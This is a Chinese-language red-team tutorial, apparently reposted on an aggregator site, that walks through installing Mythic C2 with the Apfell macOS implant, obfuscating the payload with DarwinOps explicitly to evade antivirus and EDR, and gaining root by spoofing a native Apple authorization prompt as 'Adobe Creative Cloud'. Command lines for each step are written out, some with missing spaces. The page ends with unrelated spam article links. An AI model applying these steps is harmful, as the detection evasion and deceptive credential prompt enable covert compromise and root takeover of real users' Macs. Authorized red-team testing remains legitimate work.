当前位置: 首页 > news >正文

macOS红队实战:使用DarwinOps武装Mythic C2并获取Root权限

本文将探讨如何在macOS上设置Mythic C2及其Apfell攻击载荷。我们将使用BallisKit DarwinOps对该载荷进行武装化以绕过EDR。我们还将演示如何使用权限提升模块获取Root访问权限。

1. 验证依赖项

在开始之前,请确保您拥有构建mythic-cli所需的所有依赖项:

aptinstallmake-yaptinstallgit-y

2. 从GitHub下载Mythic

从GitHub克隆Mythic仓库并进入该目录:

sudogitclone https://github.com/its-a-feature/Mythic.gitcdMythic

3. 安装Docker和Docker Compose

Mythic需要Docker和Docker Compose来运行其服务。使用以下脚本之一安装Docker:

  • Debian:./install_docker_debian.sh
  • Kali Linux:./install_docker_kali.sh
  • Ubuntu:./install_docker_ubuntu.sh

4. 构建Mythic-CLI

构建mythic-cli

make

如果一切顺利,您应该会有一个可用的./mythic-cli文件。

5. 启动Mythic

现在脚本已执行,Mythic已准备好启动:

./mythic-cli start

提示:某些容器可能需要时间初始化并与其他服务通信。最初看到错误消息是常见的;重要的是所有容器都已启动,如下所示:

(此处为容器启动图片描述)

6. 配置

所有配置都可以通过.env文件或使用以下命令完成:

./mythic-cli config

如果C2服务器需要远程访问,您必须执行以下命令:

./mythic-cli configsetmythic_server_bind_localhost_onlyfalse&&./mythic-cli restart

您现在可以从服务器的IP地址访问UI面板。如果无法连接,请确保“BOUND LOCALLY”设置为false。

(此处为服务绑定状态图片描述)

通过以下地址访问Mythic UI:

https://127.0.0.1:7443/new/login

您应该会看到如下登录面板:

(此处为Mythic登录面板图片描述)

  • 用户名:mythic_admin
  • 密码:密码是自动生成的,可以在.env文件中找到。或者,使用命令:
    grep^MYTHIC_ADMIN_PASSWORD=.env|cut-d'='-f2

7. 安装Payload和C2Profile

登录后,进入Payloads部分:

(此处为Payloads和C2Profiles界面图片描述)

目前,没有任何安装。让我们安装我们的Payload和通信信道。

  • 安装Apfell:这是用于macOS的Mythic Payload,使用JXA:

    sudo./mythic-cliinstallgithub https://github.com/MythicAgents/apfell
  • 安装HTTP C2Profile:为了与我们的攻击植入程序通信,安装HTTP C2Profile:

    sudo./mythic-cliinstallgithub https://github.com/MythicC2Profiles/http

您现在应该看到:

(此处为Payload和C2Profiles下载完成图片描述)

8. 生成Apfell Payload

生成Apfell Payload:

(此处为生成新Payload界面图片描述)

  1. 选择MacOS(如果Apfell是唯一安装的Payload,则应为默认选项)。
  2. 选择Apfell(如果它是唯一安装的Payload,也是默认选项)。
  3. 添加任何所需的命令(这些不会影响整体过程)。
  4. 在选择C2 Profiles时,确保包含HTTP

(此处为添加HTTP C2Profile图片描述)

验证参数是否匹配。默认情况下,它设置为https://和端口80。如果这些不一致,它将无法工作:

(此处为HTTP选项配置图片描述)

输入参数后,您可以下载Payload:

(此处为下载Payload界面图片描述)

9. 使用DarwinOps

现在您已经生成了Payload,防病毒程序可能会标记并删除它。因此,我们需要对其进行武装化。为此,我们将依赖DarwinOps,这是适用于MacOS的红队工具包!

使用以下命令行武装Apfell Payload:

./darwin_ops -G payload.app -i apfell.js --autopack --obfuscate
  1. 执行生成的Payload:
./in_memory_exec.js

(此处为Payload执行图片描述)

如果您需要更高权限,可以使用权限提升模块将自己伪装成可信应用程序。

./darwin_ops -G privesc.app -i apfell.js --privesc --privesc-delay-execution10--privesc-prompt_app_name"Adobe Creative Cloud"--privesc-prompt-app-icon CreativeCloudApp.icns --autopack --obfuscate

(此处为Apple原生提示符被伪装成所选应用程序的图片描述)

被伪装成我们选择的应用的Apple原生提示符,但它将以root权限启动我们的Apfell植入程序。

(此处为Apfell植入程序以root权限运行的图片描述)

如您所见,我们通过植入程序获得了Root访问权限,DarwinOps还允许您通过其他模块添加持久性。FINISHED
CSD0tFqvECLokhw9aBeRqgJcKWJF+birK01iJlMQBy8dA/IoUmQ3a8NCV4f4/iDmWdrGlB1A+YwCQcYLk3pbu5V7iJKALOsEBgS+H36NPVXQ5dRIxJeywUbdYhy6nc3+JEcVMdU+0GYoG38+NOoYTQ==
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

http://www.jsqmd.com/news/394133/

相关文章:

  • 2026年口碑好的贴片盖子/贴片式骨架哪家质量好生产商实力参考 - 行业平台推荐
  • 2026年知名的冷拉异型钢六角钢/冷拉异型钢圆钢怎么选实力厂家推荐 - 行业平台推荐
  • 2026 年春节档选片不纠结!口碑 TOP 的《惊蛰无声》,承包你所有春节观影场景 - SFMEDIA
  • 2026年靠谱的金普新区大连装修公司/中山区大连装修公司口碑精选推荐 - 行业平台推荐
  • Ubuntu 24.04.2安装调整k8s 1.35.0
  • 基于Spring Boot + 微信小程序的位置服务的城市路线分享体系 #计算机毕业设计 毕设 论文 开题报告
  • 清洗机选购不迷茫:2026年喷淋设备优选厂家,毛刷清洗机/输送网带/Z型提升机/弯板链条/输送链板,清洗机企业哪家权威 - 品牌推荐师
  • 2026年口碑好的杭州老房装修/杭州品质装修装修精选 - 行业平台推荐
  • 2026年口碑好的真空氟橡胶/耐低温氟橡胶高评价直销厂家采购指南推荐(高评价) - 行业平台推荐
  • 2026年热门的大跨距电缆桥架/镀锌电缆桥架直销厂家价格参考怎么选 - 行业平台推荐
  • 2026年热门的一体化固态继电器/新能源设备固态继电器实用公司采购参考怎么联系 - 行业平台推荐
  • Java小白面试实战:从构建工具到微服务框架的循序渐进探索
  • 2026年评价高的贯通黑线烤漆龙骨/烤漆龙骨如何选畅销厂家采购指南 - 行业平台推荐
  • 使用SSH登录云服务器,实现免密码登录
  • 2026年大字符喷码机市场口碑优选,这些公司值得信赖,激光喷码机/喷码机/大字符喷码机,大字符喷码机供应商排行 - 品牌推荐师
  • 全国产RFsoc+AI模块
  • 2026年口碑好的高分子分散剂/efka分散剂替代哪家质量好生产商实力参考 - 行业平台推荐
  • 2026年热门的氢化丁腈橡胶/耐高温氢化丁腈橡胶制造厂家实力参考哪家专业 - 行业平台推荐
  • 车载AI主动拒绝危险指令,写程序让AI判断超速,逆行指令,直接拒绝,颠覆车必须听人,输出安全决策。
  • 2026年评价高的冷拉型钢扁钢/冷拉型钢哪家质量好厂家实力参考 - 行业平台推荐
  • 2026年评价高的橡胶塑磁组件。/橡胶塑磁实力厂家综合评估推荐几家 - 行业平台推荐
  • 2026年靠谱的工业设备防水微动开关/南网机构防水微动开关哪家专业制造厂家实力参考 - 行业平台推荐
  • 春节档必看哪个电影?2026 春节档口碑电影《惊蛰无声》,春节全场景观影首选 - SFMEDIA
  • 2026年知名的液体防沉触变剂/铝粉定向触变剂哪家强品牌厂家推荐 - 行业平台推荐
  • 2026年,寻找可靠的扭矩仪制造商有哪些方向?摩擦系数仪/热封仪/测试仪/试验机/扭矩仪/分析仪,扭矩仪源头厂家推荐 - 品牌推荐师
  • 2026年口碑好的椒婆泡椒酱/泡椒酱源头厂家采购指南怎么选(畅销) - 行业平台推荐
  • 2026年靠谱的岳轩圆白红油豆瓣酱/红油豆瓣酱制造厂家选购指南怎么选(精选) - 行业平台推荐
  • 2026年质量好的电缆桥架/锌铝镁电缆桥架公司口碑推荐哪家靠谱 - 行业平台推荐
  • 2026年知名的1680D单双股布牛津布/磨砂布牛津布实力厂家推荐如何选 - 行业平台推荐
  • 2026年口碑好的牛津布箱包布/箱包布工厂采购指南如何选(实用) - 行业平台推荐